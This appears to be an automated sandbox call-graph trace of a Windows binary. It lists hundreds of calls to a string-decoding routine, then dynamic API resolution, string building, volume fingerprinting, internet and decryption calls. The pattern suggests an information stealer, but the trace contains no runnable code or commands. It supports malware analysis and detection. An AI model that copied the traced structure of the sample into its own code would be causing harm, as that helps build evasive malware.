26430 6a2fec 26429->26430 26431 6a4a60 2 API calls 26430->26431 26432 6a3002 26431->26432 26433 6a4a60 2 API calls 26432->26433 26434 6a3018 26433->26434 26435 6a4a60 2 API calls 26434->26435 26436 6a3031 26435->26436 26437 6a4a60 2 API calls 26436->26437 26438 6a3047 26437->26438 26439 6a4a60 2 API calls 26438->26439 26440 6a305d 26439->26440 26441 6a4a60 2 API calls 26440->26441 26442 6a3073 26441->26442 26443 6a4a60 2 API calls 26442->26443 26444 6a3089 26443->26444 26445 6a4a60 2 API calls 26444->26445 26446 6a309f 26445->26446 26447 6a4a60 2 API calls 26446->26447 26448 6a30b8 26447->26448 26449 6a4a60 2 API calls 26448->26449 26450 6a30ce 26449->26450 26451 6a4a60 2 API calls 26450->26451 26452 6a30e4 26451->26452 26453 6a4a60 2 API calls 26452->26453 26454 6a30fa 26453->26454 26455 6a4a60 2 API calls 26454->26455 26456 6a3110 26455->26456 26457 6a4a60 2 API calls 26456->26457 26458 6a3126 26457->26458 26459 6a4a60 2 API calls 26458->26459 26460 6a313f 26459->26460 26461 6a4a60 2 API calls 26460->26461 26462 6a3155 26461->26462 26463 6a4a60 2 API calls 26462->26463 26464 6a316b 26463->26464 26465 6a4a60 2 API calls 26464->26465 26466 6a3181 26465->26466 26467 6a4a60 2 API calls 26466->26467 26468 6a3197 26467->26468 26469 6a4a60 2 API calls 26468->26469 26470 6a31ad 26469->26470 26471 6a4a60 2 API calls 26470->26471 26472 6a31c6 26471->26472 26473 6a4a60 2 API calls 26472->26473 26474 6a31dc 26473->26474 26475 6a4a60 2 API calls 26474->26475 26476 6a31f2 26475->26476 26477 6a4a60 2 API calls 26476->26477 26478 6a3208 26477->26478 26479 6a4a60 2 API calls 26478->26479 26480 6a321e 26479->26480 26481 6a4a60 2 API calls 26480->26481 26482 6a3234 26481->26482 26483 6a4a60 2 API calls 26482->26483 26484 6a324d 26483->26484 26485 6a4a60 2 API calls 26484->26485 26486 6a3263 26485->26486 26487 6a4a60 2 API calls 26486->26487 26488 6a3279 26487->26488 26489 6a4a60 2 API calls 26488->26489 26490 6a328f 26489->26490 26491 6a4a60 2 API calls 26490->26491 26492 6a32a5 26491->26492 26493 6a4a60 2 API calls 26492->26493 26494 6a32bb 26493->26494 26495 6a4a60 2 API calls 26494->26495 26496 6a32d4 26495->26496 26497 6a4a60 2 API calls 26496->26497 26498 6a32ea 26497->26498 26499 6a4a60 2 API calls 26498->26499 26500 6a3300 26499->26500 26501 6a4a60 2 API calls 26500->26501 26502 6a3316 26501->26502 26503 6a4a60 2 API calls 26502->26503 26504 6a332c 26503->26504 26505 6a4a60 2 API calls 26504->26505 26506 6a3342 26505->26506 26507 6a4a60 2 API calls 26506->26507 26508 6a335b 26507->26508 26509 6a4a60 2 API calls 26508->26509 26510 6a3371 26509->26510 26511 6a4a60 2 API calls 26510->26511 26512 6a3387 26511->26512 26513 6a4a60 2 API calls 26512->26513 26514 6a339d 26513->26514 26515 6a4a60 2 API calls 26514->26515 26516 6a33b3 26515->26516 26517 6a4a60 2 API calls 26516->26517 26518 6a33c9 26517->26518 26519 6a4a60 2 API calls 26518->26519 26520 6a33e2 26519->26520 26521 6a4a60 2 API calls 26520->26521 26522 6a33f8 26521->26522 26523 6a4a60 2 API calls 26522->26523 26524 6a340e 26523->26524 26525 6a4a60 2 API calls 26524->26525 26526 6a3424 26525->26526 26527 6a4a60 2 API calls 26526->26527 26528 6a343a 26527->26528 26529 6a4a60 2 API calls 26528->26529 26530 6a3450 26529->26530 26531 6a4a60 2 API calls 26530->26531 26532 6a3469 26531->26532 26533 6a4a60 2 API calls 26532->26533 26534 6a347f 26533->26534 26535 6a4a60 2 API calls 26534->26535 26536 6a3495 26535->26536 26537 6a4a60 2 API calls 26536->26537 26538 6a34ab 26537->26538 26539 6a4a60 2 API calls 26538->26539 26540 6a34c1 26539->26540 26541 6a4a60 2 API calls 26540->26541 26542 6a34d7 26541->26542 26543 6a4a60 2 API calls 26542->26543 26544 6a34f0 26543->26544 26545 6a4a60 2 API calls 26544->26545 26546 6a3506 26545->26546 26547 6a4a60 2 API calls 26546->26547 26548 6a351c 26547->26548 26549 6a4a60 2 API calls 26548->26549 26550 6a3532 26549->26550 26551 6a4a60 2 API calls 26550->26551 26552 6a3548 26551->26552 26553 6a4a60 2 API calls 26552->26553 26554 6a355e 26553->26554 26555 6a4a60 2 API calls 26554->26555 26556 6a3577 26555->26556 26557 6a4a60 2 API calls 26556->26557 26558 6a358d 26557->26558 26559 6a4a60 2 API calls 26558->26559 26560 6a35a3 26559->26560 26561 6a4a60 2 API calls 26560->26561 26562 6a35b9 26561->26562 26563 6a4a60 2 API calls 26562->26563 26564 6a35cf 26563->26564 26565 6a4a60 2 API calls 26564->26565 26566 6a35e5 26565->26566 26567 6a4a60 2 API calls 26566->26567 26568 6a35fe 26567->26568 26569 6a4a60 2 API calls 26568->26569 26570 6a3614 26569->26570 26571 6a4a60 2 API calls 26570->26571 26572 6a362a 26571->26572 26573 6a4a60 2 API calls 26572->26573 26574 6a3640 26573->26574 26575 6a4a60 2 API calls 26574->26575 26576 6a3656 26575->26576 26577 6a4a60 2 API calls 26576->26577 26578 6a366c 26577->26578 26579 6a4a60 2 API calls 26578->26579 26580 6a3685 26579->26580 26581 6a4a60 2 API calls 26580->26581 26582 6a369b 26581->26582 26583 6a4a60 2 API calls 26582->26583 26584 6a36b1 26583->26584 26585 6a4a60 2 API calls 26584->26585 26586 6a36c7 26585->26586 26587 6a4a60 2 API calls 26586->26587 26588 6a36dd 26587->26588 26589 6a4a60 2 API calls 26588->26589 26590 6a36f3 26589->26590 26591 6a4a60 2 API calls 26590->26591 26592 6a370c 26591->26592 26593 6a4a60 2 API calls 26592->26593 26594 6a3722 26593->26594 26595 6a4a60 2 API calls 26594->26595 26596 6a3738 26595->26596 26597 6a4a60 2 API calls 26596->26597 26598 6a374e 26597->26598 26599 6a4a60 2 API calls 26598->26599 26600 6a3764 26599->26600 26601 6a4a60 2 API calls 26600->26601 26602 6a377a 26601->26602 26603 6a4a60 2 API calls 26602->26603 26604 6a3793 26603->26604 26605 6a4a60 2 API calls 26604->26605 26606 6a37a9 26605->26606 26607 6a4a60 2 API calls 26606->26607 26608 6a37bf 26607->26608 26609 6a4a60 2 API calls 26608->26609 26610 6a37d5 26609->26610 26611 6a4a60 2 API calls 26610->26611 26612 6a37eb 26611->26612 26613 6a4a60 2 API calls 26612->26613 26614 6a3801 26613->26614 26615 6a4a60 2 API calls 26614->26615 26616 6a381a 26615->26616 26617 6a4a60 2 API calls 26616->26617 26618 6a3830 26617->26618 26619 6a4a60 2 API calls 26618->26619 26620 6a3846 26619->26620 26621 6a4a60 2 API calls 26620->26621 26622 6a385c 26621->26622 26623 6a4a60 2 API calls 26622->26623 26624 6a3872 26623->26624 26625 6a4a60 2 API calls 26624->26625 26626 6a3888 26625->26626 26627 6a4a60 2 API calls 26626->26627 26628 6a38a1 26627->26628 26629 6a4a60 2 API calls 26628->26629 26630 6a38b7 26629->26630 26631 6a4a60 2 API calls 26630->26631 26632 6a38cd 26631->26632 26633 6a4a60 2 API calls 26632->26633 26634 6a38e3 26633->26634 26635 6a4a60 2 API calls 26634->26635 26636 6a38f9 26635->26636 26637 6a4a60 2 API calls 26636->26637 26638 6a390f 26637->26638 26639 6a4a60 2 API calls 26638->26639 26640 6a3928 26639->26640 26641 6a4a60 2 API calls 26640->26641 26642 6a393e 26641->26642 26643 6a4a60 2 API calls 26642->26643 26644 6a3954 26643->26644 26645 6a4a60 2 API calls 26644->26645 26646 6a396a 26645->26646 26647 6a4a60 2 API calls 26646->26647 26648 6a3980 26647->26648 26649 6a4a60 2 API calls 26648->26649 26650 6a3996 26649->26650 26651 6a4a60 2 API calls 26650->26651 26652 6a39af 26651->26652 26653 6a4a60 2 API calls 26652->26653 26654 6a39c5 26653->26654 26655 6a4a60 2 API calls 26654->26655 26656 6a39db 26655->26656 26657 6a4a60 2 API calls 26656->26657 26658 6a39f1 26657->26658 26659 6a4a60 2 API calls 26658->26659 26660 6a3a07 26659->26660 26661 6a4a60 2 API calls 26660->26661 26662 6a3a1d 26661->26662 26663 6a4a60 2 API calls 26662->26663 26664 6a3a36 26663->26664 26665 6a4a60 2 API calls 26664->26665 26666 6a3a4c 26665->26666 26667 6a4a60 2 API calls 26666->26667 26668 6a3a62 26667->26668 26669 6a4a60 2 API calls 26668->26669 26670 6a3a78 26669->26670 26671 6a4a60 2 API calls 26670->26671 26672 6a3a8e 26671->26672 26673 6a4a60 2 API calls 26672->26673 26674 6a3aa4 26673->26674 26675 6a4a60 2 API calls 26674->26675 26676 6a3abd 26675->26676 26677 6a4a60 2 API calls 26676->26677 26678 6a3ad3 26677->26678 26679 6a4a60 2 API calls 26678->26679 26680 6a3ae9 26679->26680 26681 6a4a60 2 API calls 26680->26681 26682 6a3aff 26681->26682 26683 6a4a60 2 API calls 26682->26683 26684 6a3b15 26683->26684 26685 6a4a60 2 API calls 26684->26685 26686 6a3b2b 26685->26686 26687 6a4a60 2 API calls 26686->26687 26688 6a3b44 26687->26688 26689 6a4a60 2 API calls 26688->26689 26690 6a3b5a 26689->26690 26691 6a4a60 2 API calls 26690->26691 26692 6a3b70 26691->26692 26693 6a4a60 2 API calls 26692->26693 26694 6a3b86 26693->26694 26695 6a4a60 2 API calls 26694->26695 26696 6a3b9c 26695->26696 26697 6a4a60 2 API calls 26696->26697 26698 6a3bb2 26697->26698 26699 6a4a60 2 API calls 26698->26699 26700 6a3bcb 26699->26700 26701 6a4a60 2 API calls 26700->26701 26702 6a3be1 26701->26702 26703 6a4a60 2 API calls 26702->26703 26704 6a3bf7 26703->26704 26705 6a4a60 2 API calls 26704->26705 26706 6a3c0d 26705->26706 26707 6a4a60 2 API calls 26706->26707 26708 6a3c23 26707->26708 26709 6a4a60 2 API calls 26708->26709 26710 6a3c39 26709->26710 26711 6a4a60 2 API calls 26710->26711 26712 6a3c52 26711->26712 26713 6a4a60 2 API calls 26712->26713 26714 6a3c68 26713->26714 26715 6a4a60 2 API calls 26714->26715 26716 6a3c7e 26715->26716 26717 6a4a60 2 API calls 26716->26717 26718 6a3c94 26717->26718 26719 6a4a60 2 API calls 26718->26719 26720 6a3caa 26719->26720 26721 6a4a60 2 API calls 26720->26721 26722 6a3cc0 26721->26722 26723 6a4a60 2 API calls 26722->26723 26724 6a3cd9 26723->26724 26725 6a4a60 2 API calls 26724->26725 26726 6a3cef 26725->26726 26727 6a4a60 2 API calls 26726->26727 26728 6a3d05 26727->26728 26729 6a4a60 2 API calls 26728->26729 26730 6a3d1b 26729->26730 26731 6a4a60 2 API calls 26730->26731 26732 6a3d31 26731->26732 26733 6a4a60 2 API calls 26732->26733 26734 6a3d47 26733->26734 26735 6a4a60 2 API calls 26734->26735 26736 6a3d60 26735->26736 26737 6a4a60 2 API calls 26736->26737 26738 6a3d76 26737->26738 26739 6a4a60 2 API calls 26738->26739 26740 6a3d8c 26739->26740 26741 6a4a60 2 API calls 26740->26741 26742 6a3da2 26741->26742 26743 6a4a60 2 API calls 26742->26743 26744 6a3db8 26743->26744 26745 6a4a60 2 API calls 26744->26745 26746 6a3dce 26745->26746 26747 6a4a60 2 API calls 26746->26747 26748 6a3de7 26747->26748 26749 6a4a60 2 API calls 26748->26749 26750 6a3dfd 26749->26750 26751 6a4a60 2 API calls 26750->26751 26752 6a3e13 26751->26752 26753 6a4a60 2 API calls 26752->26753 26754 6a3e29 26753->26754 26755 6a4a60 2 API calls 26754->26755 26756 6a3e3f 26755->26756 26757 6a4a60 2 API calls 26756->26757 26758 6a3e55 26757->26758 26759 6a4a60 2 API calls 26758->26759 26760 6a3e6e 26759->26760 26761 6a4a60 2 API calls 26760->26761 26762 6a3e84 26761->26762 26763 6a4a60 2 API calls 26762->26763 26764 6a3e9a 26763->26764 26765 6a4a60 2 API calls 26764->26765 26766 6a3eb0 26765->26766 26767 6a4a60 2 API calls 26766->26767 26768 6a3ec6 26767->26768 26769 6a4a60 2 API calls 26768->26769 26770 6a3edc 26769->26770 26771 6a4a60 2 API calls 26770->26771 26772 6a3ef5 26771->26772 26773 6a4a60 2 API calls 26772->26773 26774 6a3f0b 26773->26774 26775 6a4a60 2 API calls 26774->26775 26776 6a3f21 26775->26776 26777 6a4a60 2 API calls 26776->26777 26778 6a3f37 26777->26778 26779 6a4a60 2 API calls 26778->26779 26780 6a3f4d 26779->26780 26781 6a4a60 2 API calls 26780->26781 26782 6a3f63 26781->26782 26783 6a4a60 2 API calls 26782->26783 26784 6a3f7c 26783->26784 26785 6a4a60 2 API calls 26784->26785 26786 6a3f92 26785->26786 26787 6a4a60 2 API calls 26786->26787 26788 6a3fa8 26787->26788 26789 6a4a60 2 API calls 26788->26789 26790 6a3fbe 26789->26790 26791 6a4a60 2 API calls 26790->26791 26792 6a3fd4 26791->26792 26793 6a4a60 2 API calls 26792->26793 26794 6a3fea 26793->26794 26795 6a4a60 2 API calls 26794->26795 26796 6a4003 26795->26796 26797 6a4a60 2 API calls 26796->26797 26798 6a4019 26797->26798 26799 6a4a60 2 API calls 26798->26799 26800 6a402f 26799->26800 26801 6a4a60 2 API calls 26800->26801 26802 6a4045 26801->26802 26803 6a4a60 2 API calls 26802->26803 26804 6a405b 26803->26804 26805 6a4a60 2 API calls 26804->26805 26806 6a4071 26805->26806 26807 6a4a60 2 API calls 26806->26807 26808 6a408a 26807->26808 26809 6a4a60 2 API calls 26808->26809 26810 6a40a0 26809->26810 26811 6a4a60 2 API calls 26810->26811 26812 6a40b6 26811->26812 26813 6a4a60 2 API calls 26812->26813 26814 6a40cc 26813->26814 26815 6a4a60 2 API calls 26814->26815 26816 6a40e2 26815->26816 26817 6a4a60 2 API calls 26816->26817 26818 6a40f8 26817->26818 26819 6a4a60 2 API calls 26818->26819 26820 6a4111 26819->26820 26821 6a4a60 2 API calls 26820->26821 26822 6a4127 26821->26822 26823 6a4a60 2 API calls 26822->26823 26824 6a413d 26823->26824 26825 6a4a60 2 API calls 26824->26825 26826 6a4153 26825->26826 26827 6a4a60 2 API calls 26826->26827 26828 6a4169 26827->26828 26829 6a4a60 2 API calls 26828->26829 26830 6a417f 26829->26830 26831 6a4a60 2 API calls 26830->26831 26832 6a4198 26831->26832 26833 6a4a60 2 API calls 26832->26833 26834 6a41ae 26833->26834 26835 6a4a60 2 API calls 26834->26835 26836 6a41c4 26835->26836 26837 6a4a60 2 API calls 26836->26837 26838 6a41da 26837->26838 26839 6a4a60 2 API calls 26838->26839 26840 6a41f0 26839->26840 26841 6a4a60 2 API calls 26840->26841 26842 6a4206 26841->26842 26843 6a4a60 2 API calls 26842->26843 26844 6a421f 26843->26844 26845 6a4a60 2 API calls 26844->26845 26846 6a4235 26845->26846 26847 6a4a60 2 API calls 26846->26847 26848 6a424b 26847->26848 26849 6a4a60 2 API calls 26848->26849 26850 6a4261 26849->26850 26851 6a4a60 2 API calls 26850->26851 26852 6a4277 26851->26852 26853 6a4a60 2 API calls 26852->26853 26854 6a428d 26853->26854 26855 6a4a60 2 API calls 26854->26855 26856 6a42a6 26855->26856 26857 6a4a60 2 API calls 26856->26857 26858 6a42bc 26857->26858 26859 6a4a60 2 API calls 26858->26859 26860 6a42d2 26859->26860 26861 6a4a60 2 API calls 26860->26861 26862 6a42e8 26861->26862 26863 6a4a60 2 API calls 26862->26863 26864 6a42fe 26863->26864 26865 6a4a60 2 API calls 26864->26865 26866 6a4314 26865->26866 26867 6a4a60 2 API calls 26866->26867 26868 6a432d 26867->26868 26869 6a4a60 2 API calls 26868->26869 26870 6a4343 26869->26870 26871 6a4a60 2 API calls 26870->26871 26872 6a4359 26871->26872 26873 6a4a60 2 API calls 26872->26873 26874 6a436f 26873->26874 26875 6a4a60 2 API calls 26874->26875 26876 6a4385 26875->26876 26877 6a4a60 2 API calls 26876->26877 26878 6a439b 26877->26878 26879 6a4a60 2 API calls 26878->26879 26880 6a43b4 26879->26880 26881 6a4a60 2 API calls 26880->26881 26882 6a43ca 26881->26882 26883 6a4a60 2 API calls 26882->26883 26884 6a43e0 26883->26884 26885 6a4a60 2 API calls 26884->26885 26886 6a43f6 26885->26886 26887 6a4a60 2 API calls 26886->26887 26888 6a440c 26887->26888 26889 6a4a60 2 API calls 26888->26889 26890 6a4422 26889->26890 26891 6a4a60 2 API calls 26890->26891 26892 6a443b 26891->26892 26893 6a4a60 2 API calls 26892->26893 26894 6a4451 26893->26894 26895 6a4a60 2 API calls 26894->26895 26896 6a4467 26895->26896 26897 6a4a60 2 API calls 26896->26897 26898 6a447d 26897->26898 26899 6a4a60 2 API calls 26898->26899 26900 6a4493 26899->26900 26901 6a4a60 2 API calls 26900->26901 26902 6a44a9 26901->26902 26903 6a4a60 2 API calls 26902->26903 26904 6a44c2 26903->26904 26905 6a4a60 2 API calls 26904->26905 26906 6a44d8 26905->26906 26907 6a4a60 2 API calls 26906->26907 26908 6a44ee 26907->26908 26909 6a4a60 2 API calls 26908->26909 26910 6a4504 26909->26910 26911 6a4a60 2 API calls 26910->26911 26912 6a451a 26911->26912 26913 6a4a60 2 API calls 26912->26913 26914 6a4530 26913->26914 26915 6a4a60 2 API calls 26914->26915 26916 6a4549 26915->26916 26917 6a4a60 2 API calls 26916->26917 26918 6a455f 26917->26918 26919 6a4a60 2 API calls 26918->26919 26920 6a4575 26919->26920 26921 6a4a60 2 API calls 26920->26921 26922 6a458b 26921->26922 26923 6a4a60 2 API calls 26922->26923 26924 6a45a1 26923->26924 26925 6a4a60 2 API calls 26924->26925 26926 6a45b7 26925->26926 26927 6a4a60 2 API calls 26926->26927 26928 6a45d0 26927->26928 26929 6a4a60 2 API calls 26928->26929 26930 6a45e6 26929->26930 26931 6a4a60 2 API calls 26930->26931 26932 6a45fc 26931->26932 26933 6a4a60 2 API calls 26932->26933 26934 6a4612 26933->26934 26935 6a4a60 2 API calls 26934->26935 26936 6a4628 26935->26936 26937 6a4a60 2 API calls 26936->26937 26938 6a463e 26937->26938 26939 6a4a60 2 API calls 26938->26939 26940 6a4657 26939->26940 26941 6a4a60 2 API calls 26940->26941 26942 6a466d 26941->26942 26943 6a4a60 2 API calls 26942->26943 26944 6a4683 26943->26944 26945 6a4a60 2 API calls 26944->26945 26946 6a4699 26945->26946 26947 6a4a60 2 API calls 26946->26947 26948 6a46af 26947->26948 26949 6a4a60 2 API calls 26948->26949 26950 6a46c5 26949->26950 26951 6a4a60 2 API calls 26950->26951 26952 6a46de 26951->26952 26953 6a4a60 2 API calls 26952->26953 26954 6a46f4 26953->26954 26955 6a4a60 2 API calls 26954->26955 26956 6a470a 26955->26956 26957 6a4a60 2 API calls 26956->26957 26958 6a4720 26957->26958 26959 6a4a60 2 API calls 26958->26959 26960 6a4736 26959->26960 26961 6a4a60 2 API calls 26960->26961 26962 6a474c 26961->26962 26963 6a4a60 2 API calls 26962->26963 26964 6a4765 26963->26964 26965 6a4a60 2 API calls 26964->26965 26966 6a477b 26965->26966 26967 6a4a60 2 API calls 26966->26967 26968 6a4791 26967->26968 26969 6a4a60 2 API calls 26968->26969 26970 6a47a7 26969->26970 26971 6a4a60 2 API calls 26970->26971 26972 6a47bd 26971->26972 26973 6a4a60 2 API calls 26972->26973 26974 6a47d3 26973->26974 26975 6a4a60 2 API calls 26974->26975 26976 6a47ec 26975->26976 26977 6a4a60 2 API calls 26976->26977 26978 6a4802 26977->26978 26979 6a4a60 2 API calls 26978->26979 26980 6a4818 26979->26980 26981 6a4a60 2 API calls 26980->26981 26982 6a482e 26981->26982 26983 6a4a60 2 API calls 26982->26983 26984 6a4844 26983->26984 26985 6a4a60 2 API calls 26984->26985 26986 6a485a 26985->26986 26987 6a4a60 2 API calls 26986->26987 26988 6a4873 26987->26988 26989 6a4a60 2 API calls 26988->26989 26990 6a4889 26989->26990 26991 6a4a60 2 API calls 26990->26991 26992 6a489f 26991->26992 26993 6a4a60 2 API calls 26992->26993 26994 6a48b5 26993->26994 26995 6a4a60 2 API calls 26994->26995 26996 6a48cb 26995->26996 26997 6a4a60 2 API calls 26996->26997 26998 6a48e1 26997->26998 26999 6a4a60 2 API calls 26998->26999 27000 6a48fa 26999->27000 27001 6a4a60 2 API calls 27000->27001 27002 6a4910 27001->27002 27003 6a4a60 2 API calls 27002->27003 27004 6a4926 27003->27004 27005 6a4a60 2 API calls 27004->27005 27006 6a493c 27005->27006 27007 6a4a60 2 API calls 27006->27007 27008 6a4952 27007->27008 27009 6a4a60 2 API calls 27008->27009 27010 6a4968 27009->27010 27011 6a4a60 2 API calls 27010->27011 27012 6a4981 27011->27012 27013 6a4a60 2 API calls 27012->27013 27014 6a4997 27013->27014 27015 6a4a60 2 API calls 27014->27015 27016 6a49ad 27015->27016 27017 6a4a60 2 API calls 27016->27017 27018 6a49c3 27017->27018 27019 6a4a60 2 API calls 27018->27019 27020 6a49d9 27019->27020 27021 6a4a60 2 API calls 27020->27021 27022 6a49ef 27021->27022 27023 6a4a60 2 API calls 27022->27023 27024 6a4a08 27023->27024 27025 6a4a60 2 API calls 27024->27025 27026 6a4a1e 27025->27026 27027 6a4a60 2 API calls 27026->27027 27028 6a4a34 27027->27028 27029 6a4a60 2 API calls 27028->27029 27030 6a4a4a 27029->27030 27031 6c66e0 27030->27031 27032 6c66ed 43 API calls 27031->27032 27033 6c6afe 8 API calls 27031->27033 27032->27033 27034 6c6c08 27033->27034 27035 6c6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27033->27035 27036 6c6c15 8 API calls 27034->27036 27037 6c6cd2 27034->27037 27035->27034 27036->27037 27038 6c6d4f 27037->27038 27039 6c6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27037->27039 27040 6c6d5c 6 API calls 27038->27040 27041 6c6de9 27038->27041 27039->27038 27040->27041 27042 6c6df6 12 API calls 27041->27042 27043 6c6f10 27041->27043 27042->27043 27044 6c6f8d 27043->27044 27045 6c6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27043->27045 27046 6c6f96 GetProcAddress GetProcAddress 27044->27046 27047 6c6fc1 27044->27047 27045->27044 27046->27047 27048 6c6fca GetProcAddress GetProcAddress 27047->27048 27049 6c6ff5 27047->27049 27048->27049 27050 6c70ed 27049->27050 27051 6c7002 10 API calls 27049->27051 27052 6c70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27050->27052 27053 6c7152 27050->27053 27051->27050 27052->27053 27054 6c716e 27053->27054 27055 6c715b GetProcAddress 27053->27055 27056 6c7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27054->27056 27057 6c051f 27054->27057 27055->27054 27056->27057 27058 6a1530 27057->27058 27367 6a1610 27058->27367 27060 6a153b 27061 6a1555 lstrcpy 27060->27061 27062 6a155d 27060->27062 27061->27062 27063 6a1577 lstrcpy 27062->27063 27064 6a157f 27062->27064 27063->27064 27065 6a1599 lstrcpy 27064->27065 27066 6a15a1 27064->27066 27065->27066 27067 6a1605 27066->27067 27068 6a15fd lstrcpy 27066->27068 27069 6bf1b0 lstrlen 27067->27069 27068->27067 27070 6bf1e4 27069->27070 27071 6bf1eb lstrcpy 27070->27071 27072 6bf1f7 lstrlen 27070->27072 27071->27072 27073 6bf208 27072->27073 27074 6bf21b lstrlen 27073->27074 27075 6bf20f lstrcpy 27073->27075 27076 6bf22c 27074->27076 27075->27074 27077 6bf233 lstrcpy 27076->27077 27078 6bf23f 27076->27078 27077->27078 27079 6bf258 lstrcpy 27078->27079 27080 6bf264 27078->27080 27079->27080 27081 6bf286 lstrcpy 27080->27081 27082 6bf292 27080->27082 27081->27082 27083 6bf2ba lstrcpy 27082->27083 27084 6bf2c6 27082->27084 27083->27084 27085 6bf2ea lstrcpy 27084->27085 27146 6bf300 27084->27146 27085->27146 27086 6bf30c lstrlen 27086->27146 27087 6bf4b9 lstrcpy 27087->27146 27088 6bf3a1 lstrcpy 27088->27146 27089 6bf3c5 lstrcpy 27089->27146 27090 6bf4e8 lstrcpy 27151 6bf4f0 27090->27151 27091 6befb0 35 API calls 27091->27151 27092 6bf479 lstrcpy 27092->27146 27093 6bf59c lstrcpy 27093->27151 27094 6bf616 StrCmpCA 27095 6bf70f StrCmpCA 27094->27095 27094->27151 27099 6bfe8e 27095->27099 27095->27146 27096 6bfa29 StrCmpCA 27107 6bfe2b 27096->27107 27096->27146 27097 6bf73e lstrlen 27097->27146 27098 6bfead lstrlen 27113 6bfec7 27098->27113 27099->27098 27105 6bfea5 lstrcpy 27099->27105 27100 6bfd4d StrCmpCA 27102 6bfd60 Sleep 27100->27102 27110 6bfd75 27100->27110 27101 6bf64a lstrcpy 27101->27151 27102->27146 27103 6bfa58 lstrlen 27103->27146 27104 6a1530 8 API calls 27104->27151 27105->27098 27106 6bfe4a lstrlen 27120 6bfe64 27106->27120 27107->27106 27108 6bfe42 lstrcpy 27107->27108 27108->27106 27109 6bf89e lstrcpy 27109->27146 27111 6bfd94 lstrlen 27110->27111 27115 6bfd8c lstrcpy 27110->27115 27122 6bfdae 27111->27122 27112 6bf76f lstrcpy 27112->27146 27114 6bfee7 lstrlen 27113->27114 27117 6bfedf lstrcpy 27113->27117 27118 6bff01 27114->27118 27115->27111 27116 6bfbb8 lstrcpy 27116->27146 27117->27114 27128 6bff21 27118->27128 27129 6bff19 lstrcpy 27118->27129 27119 6bfa89 lstrcpy 27119->27146 27121 6bfdce lstrlen 27120->27121 27123 6bfe7c lstrcpy 27120->27123 27135 6bfde8 27121->27135 27122->27121 27133 6bfdc6 lstrcpy 27122->27133 27123->27121 27124 6bf791 lstrcpy 27124->27146 27126 6a1530 8 API calls 27126->27146 27127 6bf8cd lstrcpy 27127->27151 27130 6a1610 4 API calls 27128->27130 27129->27128 27153 6bfe13 27130->27153 27131 6bfaab lstrcpy 27131->27146 27132 6bf698 lstrcpy 27132->27151 27133->27121 27134 6bfbe7 lstrcpy 27134->27151 27137 6bfe08 27135->27137 27138 6bfe00 lstrcpy 27135->27138 27136 6bee90 28 API calls 27136->27146 27139 6a1610 4 API calls 27137->27139 27138->27137 27139->27153 27140 6bf7e2 lstrcpy 27140->27146 27141 6bf924 lstrcpy 27141->27151 27142 6bf99e StrCmpCA 27142->27096 27142->27151 27143 6bfafc lstrcpy 27143->27146 27144 6bfc3e lstrcpy 27144->27151 27145 6bfcb8 StrCmpCA 27145->27100 27145->27151 27146->27086 27146->27087 27146->27088 27146->27089 27146->27090 27146->27092 27146->27095 27146->27096 27146->27097 27146->27100 27146->27103 27146->27109 27146->27112 27146->27116 27146->27119 27146->27124 27146->27126 27146->27127 27146->27131 27146->27134 27146->27136 27146->27140 27146->27143 27146->27151 27147 6bf9cb lstrcpy 27147->27151 27148 6bfce9 lstrcpy 27148->27151 27149 6bee90 28 API calls 27149->27151 27150 6bfa19 lstrcpy 27150->27151 27151->27091 27151->27093 27151->27094 27151->27096 27151->27100 27151->27101 27151->27104 27151->27132 27151->27141 27151->27142 27151->27144 27151->27145 27151->27146 27151->27147 27151->27148 27151->27149 27151->27150 27152 6bfd3a lstrcpy 27151->27152 27152->27151 27153->26177 27155 6c278c GetVolumeInformationA 27154->27155 27156 6c2785 27154->27156 27158 6c27ec GetProcessHeap RtlAllocateHeap 27155->27158 27156->27155 27159 6c2826 wsprintfA 27158->27159 27160 6c2822 27158->27160 27159->27160 27377 6c71e0 27160->27377 27164 6a4c70 27163->27164 27165 6a4c85 27164->27165 27166 6a4c7d lstrcpy 27164->27166 27381 6a4bc0 27165->27381 27166->27165 27168 6a4c90 27169 6a4ccc lstrcpy 27168->27169 27170 6a4cd8 27168->27170 27169->27170 27171 6a4cff lstrcpy 27170->27171 27172 6a4d0b 27170->27172 27171->27172 27173 6a4d2f lstrcpy 27172->27173 27174 6a4d3b 27172->27174 27173->27174 27175 6a4d6d lstrcpy 27174->27175 27176 6a4d79 27174->27176 27175->27176 27177 6a4dac InternetOpenA StrCmpCA 27176->27177 27178 6a4da0 lstrcpy 27176->27178 27179 6a4de0 27177->27179 27178->27177 27180 6a54b8 InternetCloseHandle CryptStringToBinaryA 27179->27180 27385 6c3e70 27179->27385 27182 6a54e8 LocalAlloc 27180->27182 27198 6a55d8 27180->27198 27183 6a54ff CryptStringToBinaryA 27182->27183 27182->27198 27184 6a5529 lstrlen 27183->27184 27185 6a5517 LocalFree 27183->27185 27186 6a553d 27184->27186 27185->27198 27188 6a5563 lstrlen 27186->27188 27189 6a5557 lstrcpy 27186->27189 27187 6a4dfa 27190 6a4e23 lstrcpy lstrcat 27187->27190 27191 6a4e38 27187->27191 27193 6a557d 27188->27193 27189->27188 27190->27191 27192 6a4e5a lstrcpy 27191->27192 27194 6a4e62 27191->27194 27192->27194 27195 6a558f lstrcpy lstrcat 27193->27195 27196 6a55a2 27193->27196 27197 6a4e71 lstrlen 27194->27197 27195->27196 27199 6a55d1 27196->27199 27201 6a55c9 lstrcpy 27196->27201 27200 6a4e89 27197->27200 27198->26206 27199->27198 27202 6a4e95 lstrcpy lstrcat 27200->27202 27203 6a4eac 27200->27203 27201->27199 27202->27203 27204 6a4ed5 27203->27204 27205 6a4ecd lstrcpy 27203->27205 27206 6a4edc lstrlen 27204->27206 27205->27204 27207 6a4ef2 27206->27207 27208 6a4efe lstrcpy lstrcat 27207->27208 27209 6a4f15 27207->27209 27208->27209 27210 6a4f36 lstrcpy 27209->27210 27211 6a4f3e 27209->27211 27210->27211 27212 6a4f65 lstrcpy lstrcat 27211->27212 27213 6a4f7b 27211->27213 27212->27213 27214 6a4fa4 27213->27214 27215 6a4f9c lstrcpy 27213->27215 27216 6a4fab lstrlen 27214->27216 27215->27214 27217 6a4fc1 27216->27217 27218 6a4fcd lstrcpy lstrcat 27217->27218 27219 6a4fe4 27217->27219 